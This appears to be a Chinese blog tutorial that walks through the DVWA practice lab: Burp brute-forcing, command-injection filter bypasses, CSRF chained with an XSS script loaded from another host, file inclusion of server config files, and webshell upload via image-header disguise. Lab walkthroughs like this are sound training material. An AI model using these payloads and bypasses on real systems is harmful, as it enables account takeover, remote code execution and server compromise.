DVWA通关教程(上)

DVWA之暴力破解  低级,中级,高级(宏)和音叉

1.低级

(1)发送账户和错误密码 去burp把拦截到的内容发送到测试器

 

 

 

 (2)点击开始攻击,看回复的字节长度 确定账户密码

 

2.中级

(1)发送账户和密码 去burp把拦截到的内容发送到测试器

 

 

 

 (2)点击开始攻击,查看回复的字节长度判断出账户密码

3.高级

(1)打开burp 先不拦截 2008也打开

(2)打开工具栏浏览器 输入http://172.16.12.131:81 登录admin 把安全级别设置成high

(3)注销,重新登陆dvwa

(4)打开burp,查看代理的HTTP历史记录下的GET方法里边是否有token

 (5)去项目选项 找到会议下边的宏 选择添加

 (6)找到第二次登录的GET方法那里,查看响应信息的token是否一致,然后点击OK

 (7)再点击项目设置

(8)选择添加

(9)设置参数名称:user_token (这个得跟下边的名称一致),然后吧value里边的token值选中,点击OK

 (10)可以测试宏,看看每一次的token是否有变化,再点击OK

 

 (11)然后添加一个会话处理规则

 规则细节这个名称可以随便写

 

 (12)去代理 打开拦截 在浏览器输入用户名和密码,把拦截到的信息发送给测试器

 (13)去位置 选择集束炸弹,把用户名和密码选中

 (14)然后有效载荷设置运行时文件username和password

 

 (15)选项 线程数改成1,重定向选择总是

 

 (16)开始攻击

3.高级 (方法2) 用音叉攻击 不过前提得知道账户

(1)输入账户密码 进行拦截 发送给测试器

 在测试器的选项

 也在测试器

 

 (2)把上边的token值复制下来 然后复制点开始攻击

 (3)查看回复的字节不同 得到密码

命令注入

1. low(低级)

正常ping一个ip 然后发现后边可以输入空格

 我们就可以尝试获取对方的用户名称

2.medium(中级)

中级会过滤掉“&&”和“;” 过滤只过滤一次,不会循环过滤

 所以我们可以尝试在两个“&&”中间加一个“;” 看来我们是成功了

 也可以尝试只输入一个“&” 哦豁,老天在眷顾我们

3.high(高级)

高级过滤掉很多符号

 但是“| ”管道符后边多了一个空格,所以我们来试试看

”&&”与” &”的区别:

Command 1&&Command 2

先执行 Command 1,执行成功后执行 Command 2,否则不执行 Command2

Command 1&Command 2

先执行 Command 1,不管是否成功,都会执行 Command 2

(Linux 中的&是后台运行,最后和;是一样的效果。。。当然最后的结果都是一样的)

”||”与” |”的区别:

Command 1||Command 2

当 Command1 执行成功,就不执行 Command2,只有当 Command1 执行失败才会执行Command2。

Command 1|Command 2

不管 Command1 是否可以执行成功,都会写很执行 Command2。

CSRF(跨站请求伪造)

跨站请求伪造

第一步:骗对方登陆网站

第二部:骗对方打开链接(生成短链接再发给对方,然后就会执行修改密码的命令,他的密码就被改成Pa9865321了

1.low(低级)

他没有任何的防范机制,不需要旧密码就可以直接修改

 也可以在这里修改

2.medium(中级)

在windows2008写一个t.html文本,里边写入木马,放在C盘下的DVWA下的htdocs下(131ip是2008的ip)

 让他点击这个链接,他的密码就被修改了(跳出来一个404和file not found 这俩标题)

中级第二种方法 把t.html改成172.16.12.131.html

去浏览器访问 172.16.12.33/172.16.12.131.html,然后注销重登录密码已经被改了(33是添加的一个IP地址)

3.high(高级)

写一个xss.js脚本,放在C下的DVWA下的htdocs下(ip是2008的ip)

 去网络里边添加一个172.16.12.33这个IP

 然后一路确定出去, 再去xampp的config的第一个配置文件里边添加监听80端口的ip,在重启apache

 记得把防火墙里边的80端口给开启

 把172.16.12.131里边的配置给改成http://172.16.12.131:81/vulnerabilities/xss_d/?default=English#<script src="http://172.16.12.33/xss.js"></script>,再去浏览器访问这个链接

 在hacker7浏览器访问上边那个链接,会出现三个弹窗,然后注销重新登陆,密码就已经被更改

文件包含漏洞

1.low(低级)

点击文件1,然后看他的传参,会发现page=后边可以直接添加修改想要查看的文件路径

 这时候可以添加一个路径进去 c:\xampp\apache\conf\httpd.conf 读取这个配置文件

 也可以查看这个读取详细信息 c:/xampp/htdocs/dashboard/phpinfo.php

2.mudium(中级别)

过滤掉这些,可以想办法让他们组合到一块,比如hhttp://ttp://

3.high(高级)

只能用file值 所以我们可以file:///c://xampp/apache/conf/httpd.conf 就读取到了配置文件

DVWA之文件上传(File Upload)

LOW

原理:因为服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明

显的文件上传漏洞 所以可以直接上传shell.php

推荐使用 poison.php 过程略

Medium

(1)上传图片

(2)在Burp里面截获上传包

(3)把文件名改成以php结尾的名字 321.php

 (4)利用一句话木马注入到结尾

 (5)放包 成功会显示上传成功

 (6)然后打开中国蚁剑 测试连接 然后添加

 (7)成功获取webshell

利用冰蝎 获取webshell

(1)首先去冰蝎文件夹里找到shell.php

 (2)修改密码

 (3)利用CaptfEncoder 把需要生成的密码(Pa9865321)转换成MD5类型 取前16位

 (4)替换

(5)把新生成的shell.php文件复制到BURP拦截的包后面 放包 上传文件成功

(6)打开冰蝎 添加URL 和密码 成功获取webshell

High

对比medium级别 high增加了一些限制 High 级别的代码读取文件名中最后一个”.”后的字符串(查看课件里的核心代码),期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpg”、”.jpeg” 、”*.png”之一。同时,getimagesize 函数更是限制了上传文件的文件头必须为图像类型。

(1)需要将上传文件的文件头伪装成图片

shell.php 命名为p.php

保存

 与需要上传的图片放到一起 放到了D盘

打开命令行 查看d区 文件

 1.jpg和p.php 合并

 文件上传新合成的3.jpg

(2)进入命令注入 把3.jpg改成33.php

先进入到VS CODE 把命令行打下来 127.0.0.1 |rename ..\..\hackable\uploads\3.jpg 33.php

 提交后 没有反馈信息

 到 XAMPP的DVWA\hackable\upload查看 证明修改成功

 (3)打开冰蝎

 成功进入webshell

第二部分内容

https://blog.csdn.net/m0_57349349/article/details/119343154?spm=1001.2014.3001.5501

  • 2
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA(Damn Vulnerable Web Application)是一个专门用于测试和学习Web应用安全的漏洞实验平台。CSRF(Cross-Site Request Forgery)跨站请求伪造是一种常见的Web安全漏洞。下面是一个简单的DVWA CSRF通关教程: 1. 下载和安装DVWA:首先,你需要从DVWA官方网站下载DVWA实验平台,并将其部署到你的本地服务器或虚拟机中。 2. 启动DVWA:在你的服务器上启动DVWA,并确保它可以通过浏览器访问。 3. 注册并登录:使用你的浏览器访问DVWA,并注册一个新用户。然后,使用你的新用户登录到DVWA。 4. 寻找CSRF漏洞:在DVWA的主界面上,点击"CSRF"标签,进入CSRF页面。 5. 查看源代码:在CSRF页面上,查看页面的HTML源代码。寻找包含表单提交功能的表单。 6. 构造恶意请求:根据HTML源代码,构造一个恶意请求,该请求可能会执行一些不安全的操作,例如更改用户密码或删除帐户。 7. 利用CSRF漏洞:使用构造的恶意请求,通过其他方式引导用户访问你构建的恶意请求链接。当用户访问这个链接时,他们的操作将被执行,而他们可能并不知情。 8. 验证漏洞:通过在DVWA中检查相关操作是否被执行,来验证是否成功利用了CSRF漏洞。 请注意,在进行漏洞测试时,确保只在授权范围内操作,并遵循合法的道德规范。漏洞测试应该仅用于学习和安全研究目的,不应用于非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值